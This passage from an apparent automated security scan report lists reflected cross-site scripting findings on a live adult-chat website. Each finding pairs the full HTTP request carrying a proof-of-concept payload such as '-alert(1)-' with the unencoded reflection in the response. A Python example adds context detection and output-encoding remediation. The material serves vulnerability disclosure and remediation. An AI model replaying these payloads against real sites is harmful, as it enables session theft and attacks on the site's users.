Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:42 GMT
Connection: close
Content-Length: 33699
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian/?799a4'-alert(1)-'5a8a05031a3=1&qs=cat=1^roomid=11^799a4'-alert(1)-'5a8a05031a3=1&qs=cat=1^roomid=11^799a4'-alert(1)-'5a8a05031a3=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.98. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af6d9"><a>bfa76ccfa1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/lesbian/?af6d9"><a>bfa76ccfa1f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:33 GMT
Connection: close
Content-Length: 33515
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/lesbian/?af6d9"><a>bfa76ccfa1f=1">
...[SNIP]...

2.99. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/live-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f783'-alert(1)-'ad3501b39a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the sink is the analytics snippet, which copies the raw request URL (the ul= value) into a single-quoted JavaScript string; where that cannot be avoided, the value must be encoded for the JavaScript string context (for example, \uXXXX-escaping every character outside a small alphanumeric allow-list) before it is written into the script.

Request

GET /live-sex-chats/live-sex-video/?7f783'-alert(1)-'ad3501b39a0=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:16 GMT
Connection: close
Content-Length: 25590
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/videoslibrary.aspx&he=imlive.com&ul=/live-sex-chats/live-sex-video/?7f783'-alert(1)-'ad3501b39a0=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.100. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/live-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6088"><a>d342b9399fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that in the response below the attribute is an onclick handler, so the reflected value also sits inside a single-quoted JavaScript string (dAccess('...')); the script-context remediation given for 2.99 applies to this sink as well.

Request

GET /live-sex-chats/live-sex-video/?e6088"><a>d342b9399fb=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:03 GMT
Connection: close
Content-Length: 25443
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/live-sex-video/?e6088"><a>d342b9399fb=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...
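The three sinks shown in 2.98 through 2.100 above (a single-quoted JavaScript string in the analytics script, a double-quoted href, and a dAccess('...') call inside a double-quoted onclick) can be classified, checked and fixed mechanically. The Python below is an added example written for this report; it is not the scanner's code and nothing in it comes from imlive.com. The sink strings are constructed from the response snippets above and trimmed, the canary is fixed rather than random, every function name is the example's own, and the JavaScript scanner is deliberately minimal (string literals and backslash escapes only).

```python
"""Context check and output encoding for this report's reflection sinks (added example; all names are the example's own)."""
import html
import re

# Constructed sinks, trimmed from findings 2.98-2.100; "{P}" marks where the raw parameter name is copied in.
SCRIPT_SINK = ("<script type=\"text/javascript\">try{var imgSrc='http://analytic.imlive.com/w.gif"
               "?ul=/live-sex-chats/live-sex-video/?{P}=1&ld=701';}catch(e){};</script>")
ATTR_SINK = '<a href="/live-sex-chats/lesbian/?{P}=1">'
ONCLICK_SINK = ("<a class=\"en\" href=\"http://imlive.com/\" onclick=\"dAccess("
                "'http://imlive.com/live-sex-chats/live-sex-video/?{P}=1');return false;\">")
CANARY = "zq8k1w"  # fixed for reproducibility; real tooling randomises it

def render(sink, text):
    return sink.replace("{P}", text)  # simulate the server copying text in with no encoding

def _quote_open(text, q):
    """Odd count of unescaped q => a q-delimited literal is still open at the end of text."""
    n, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2
            continue
        n += text[i] == q
        i += 1
    return n % 2 == 1

def reflection_context(body, marker):
    """The two cases the 'Issue detail' text distinguishes, plus the JS-string-inside-onclick case."""
    i = body.find(marker)
    if i < 0:
        return "not_reflected"
    before = body[:i]
    s = before.rfind("<script")
    if s >= 0 and before.rfind("</script>") < s:
        return "js_string" if _quote_open(before[before.find(">", s) + 1:], "'") else "js_code"
    t = before.rfind("<")
    if t >= 0 and before.rfind(">") < t:
        m = re.search(r'\s([A-Za-z-]+)="([^"]*)$', before[t:])
        if m and m.group(1).lower().startswith("on") and _quote_open(m.group(2), "'"):
            return "js_string_in_attr"
        return "html_attr" if m else "html_tag"
    return "html_text"

def js_single_quoted(value):
    """All but a short allow-list becomes \\uXXXX (UTF-16 units, so astral chars get a surrogate pair)."""
    out = []
    for c in value:
        if re.fullmatch(r"[A-Za-z0-9 ,.:/?=&_-]", c):
            out.append(c)
        else:
            u = c.encode("utf-16-be")
            out.append("".join("\\u%04x" % int.from_bytes(u[k:k + 2], "big") for k in range(0, len(u), 2)))
    return "".join(out)

def js_in_event_handler(value):
    """Browser HTML-decodes the attribute, then parses JS: encode the inner (JS) layer first, outer second."""
    return html.escape(js_single_quoted(value), quote=True)

ENCODERS = {"js_string": js_single_quoted, "html_attr": lambda v: html.escape(v, quote=True),
            "js_string_in_attr": js_in_event_handler}

def _js_string_spans(code):
    """Content spans of ' and " literals; minimal scanner (no regex, comment or template literals)."""
    spans, i = [], 0
    while i < len(code):
        if code[i] in "'\"":
            q, j = code[i], i + 1
            while j < len(code) and code[j] != q:
                j += 2 if code[j] == "\\" else 1
            spans.append((i + 1, j))
            i = j + 1
        else:
            i += 1
    return spans

def _covering(spans, start, end):
    return next(((s, e) for s, e in spans if s <= start and end <= e), None)

def stays_in_context(body, inserted, context):
    """True when all of inserted is still inside the quoted construct the sink put it in; False is the break-out."""
    i = body.find(inserted)
    assert i >= 0, "inserted text not found"
    end = i + len(inserted)
    if context == "js_string":
        s = body.find(">", body.rfind("<script", 0, i)) + 1
        return _covering(_js_string_spans(body[s:]), i - s, end - s) is not None
    t = body.rfind("<", 0, i)
    spans = [(t + m.start(1), t + m.end(1)) for m in re.finditer(r'="([^"]*)"', body[t:])]
    span = _covering(spans, i, end)
    if span is None or context == "html_attr":
        return span is not None
    value, inner = html.unescape(body[span[0]:span[1]]), html.unescape(inserted)  # peel the HTML layer
    j = value.find(inner)
    return j >= 0 and _covering(_js_string_spans(value), j, j + len(inner)) is not None

def assess(sink, payload):
    """Context a canary lands in, whether the raw payload breaks out, and whether the matched encoder contains it."""
    context = reflection_context(render(sink, CANARY), CANARY)
    encoded = ENCODERS[context](payload)
    return {"context": context,
            "raw_breaks_out": not stays_in_context(render(sink, payload), payload, context),
            "encoded_contained": stays_in_context(render(sink, encoded), encoded, context)}
```

assess(SCRIPT_SINK, "'-alert(1)-'") reports raw_breaks_out True and encoded_contained True, while assess(ATTR_SINK, "'-alert(1)-'") reports raw_breaks_out False: a single-quote payload does nothing to a double-quoted attribute, which is why the scanner pairs each context with its own payload. Both payloads break out of ONCLICK_SINK, the nested case the "Firm" findings undersell. The encoders are the fix: \uXXXX-escaping for the script string, html.escape for the attribute, and JS-then-HTML for the event handler, because the browser undoes the layers in the opposite order.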

2.101. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/nude-chat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb7a'-alert(1)-'34ec5f17816 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/nude-chat/?acb7a'-alert(1)-'34ec5f17816=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:29 GMT
Connection: close
Content-Length: 23794
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/keyholesexplanation.aspx&he=imlive.com&ul=/live-sex-chats/nude-chat/?acb7a'-alert(1)-'34ec5f17816=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.102. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/nude-chat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06eb"><a>2a1bdec8937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that in the response below the attribute is an onclick handler, so the reflected value also sits inside a single-quoted JavaScript string (dAccess('...')); the script-context remediation given for 2.101 applies to this sink as well.

Request

GET /live-sex-chats/nude-chat/?f06eb"><a>2a1bdec8937=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:23 GMT
Connection: close
Content-Length: 23647
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/nude-chat/?f06eb"><a>2a1bdec8937=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.103. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/orgies/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44239'-alert(1)-'0a5659e80e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/orgies/?44239'-alert(1)-'0a5659e80e9=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:29 GMT
Connection: close
Content-Length: 49856
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/orgies/?44239'-alert(1)-'0a5659e80e9=1&qs=cat=1^roomid=14^44239'-alert(1)-'0a5659e80e9=1&qs=cat=1^roomid=14^44239'-alert(1)-'0a5659e80e9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.104. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/orgies/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b235"><a>bd631be4c53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/orgies/?4b235"><a>bd631be4c53=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
